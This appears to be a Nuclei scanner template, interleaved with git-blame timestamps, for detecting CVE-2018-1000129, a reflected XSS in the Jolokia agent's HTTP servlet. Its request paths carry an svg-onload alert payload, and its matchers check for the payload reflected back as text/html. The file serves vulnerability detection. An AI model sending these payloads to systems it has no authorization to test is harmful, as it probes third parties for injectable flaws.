2021-01-02 05:00:39 +00:00
id : CVE-2018-1000129
2020-06-17 09:16:11 +00:00
info :
name : Jolokia XSS
2022-05-16 23:31:59 +00:00
author : mavericknerd,0h1in9e,daffainfo
2021-09-10 11:26:40 +00:00
severity : medium
2020-08-25 22:15:20 +00:00
description : An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
2021-09-10 11:26:40 +00:00
reference :
- https://jolokia.org/#Security_fixes_with_1.5.0
- https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad
2022-05-16 23:31:59 +00:00
- https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html
- https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/
2022-04-22 10:38:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2018-1000129
cwe-id : CWE-79
tags : cve,cve2018,jolokia,xss
2020-06-17 09:16:11 +00:00
requests :
- method : GET
path :
2022-05-16 23:31:59 +00:00
- "{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"
- "{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"
stop-at-first-match : true
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-06-17 09:16:11 +00:00
matchers :
- type : status
status :
- 200
2022-05-16 23:31:59 +00:00
2020-06-17 09:16:11 +00:00
- type : word
2022-05-16 23:31:59 +00:00
part : body
2020-06-17 09:16:11 +00:00
words :
2020-09-01 12:42:12 +00:00
- "<svg onload=alert(document.domain)>"
2022-05-16 23:31:59 +00:00
- "java.lang.IllegalArgumentException"
- "No type with name"
condition : and
2020-09-01 12:42:12 +00:00
- type : word
2022-05-16 23:31:59 +00:00
part : header
2020-09-01 12:42:12 +00:00
words :
- "text/html"